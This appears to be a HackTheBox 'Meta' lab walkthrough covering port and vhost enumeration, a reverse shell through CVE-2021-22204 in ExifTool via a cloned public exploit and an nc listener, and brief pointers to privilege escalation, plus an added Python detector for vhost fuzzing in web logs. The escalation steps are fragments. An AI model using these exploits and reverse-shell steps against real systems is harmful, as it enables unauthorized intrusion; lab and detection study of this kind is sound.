Today I decided to create the HackTheBox Meta WriteUp. Meta is a medium machine running Linux, released on 22 Jan 2022.

sudo rustscan -a 10.129.17.37 --

I started scanning the machine using rustscan and detected two open ports, 22 and 80.

Port 22 is running SSH; I move on and start scanning port 80.

Port 80

On port 80 we have a web server. The title tag reveals the domain in use, which we add to the /etc/hosts file.

echo '10.129.17.37  artcorp.htb' | sudo tee -a /etc/hosts

On the index page we have a simple website, and I found nothing investigating the source code.


Search Directories on Port 80

Searching for new directories:

dirsearch -u http://artcorp.htb

Enumerate Virtual Hosts

wfuzz -c -f subdomains.txt -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://artcorp.htb/" -H "Host: FUZZ.artcorp.htb" --hl 154
open http://dev01.artcorp.htb/metaview/
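
Seen from the web server's side, the Host-header fuzzing above leaves a recognizable trace: one client asks for many different names under artcorp.htb, and nearly all of them get the same default response (the responses that --hl 154 filters out). The detector below is an added example, not part of the original writeup; the log format, the sample lines, the client addresses and the thresholds are assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample lines in an assumed Apache LogFormat "%{Host}i %h %>s %B":
# Host header as sent by the client, client IP, final status, body bytes.
SAMPLE_LOG = """\
artcorp.htb 10.10.14.2 200 4427
dev01.artcorp.htb 10.10.14.2 200 247
dev01.artcorp.htb 10.10.14.2 200 247
www.artcorp.htb 10.10.14.7 200 4427
mail.artcorp.htb 10.10.14.7 200 4427
ftp.artcorp.htb 10.10.14.7 200 4427
admin.artcorp.htb:80 10.10.14.7 200 4427
test.artcorp.htb 10.10.14.7 200 4427
dev01.artcorp.htb 10.10.14.7 200 247
this line is truncated
"""

def parse(log_text):
    """Yield (host, client, status, size); skip lines that do not fit the format."""
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4 or not (parts[2].isdigit() and parts[3].isdigit()):
            continue
        host = parts[0].lower().split(":")[0].rstrip(".")  # drop port, trailing dot
        yield host, parts[1], int(parts[2]), int(parts[3])

def find_vhost_fuzzers(log_text, base_domain, min_hosts=5, min_baseline=0.8):
    """Flag clients that request many distinct subdomains of base_domain and
    mostly receive one identical (status, size) response, i.e. the default vhost."""
    names = defaultdict(set)
    responses = defaultdict(Counter)
    for host, client, status, size in parse(log_text):
        if host.endswith("." + base_domain):
            names[client].add(host)
            responses[client][(status, size)] += 1
    findings = {}
    for client, hosts in names.items():
        total = sum(responses[client].values())
        baseline = responses[client].most_common(1)[0][1] / total
        if len(hosts) >= min_hosts and baseline >= min_baseline:
            findings[client] = {"distinct_hosts": len(hosts),
                                "baseline_share": round(baseline, 2)}
    return findings

if __name__ == "__main__":
    print(find_vhost_fuzzers(SAMPLE_LOG, "artcorp.htb"))
```

The Host header only appears in the access log if the format includes it; Apache's %v field records the server name of the matching vhost, not what the client sent.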

Get a Reverse Shell – CVE-2021-22204

After spending more than 20m thinking and analyzing the page, I noticed the answer was in front of me! Metadata!

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool.git
sudo apt install djvulibre-bin exiftool

Edit the exploit.py file and set the IP and port of your listener.

Start your listener and run the exploit:

rlwrap -cAr nc -lvnp 4430
python3 exploit.py

Escalate Privileges to User

https://github.com/Hood3dRob1n/CVE-2016-3714

Escalate Privileges to R00t

$XDG_CONFIG_HOME defines the base directory relative to which user-specific configuration files should be stored.
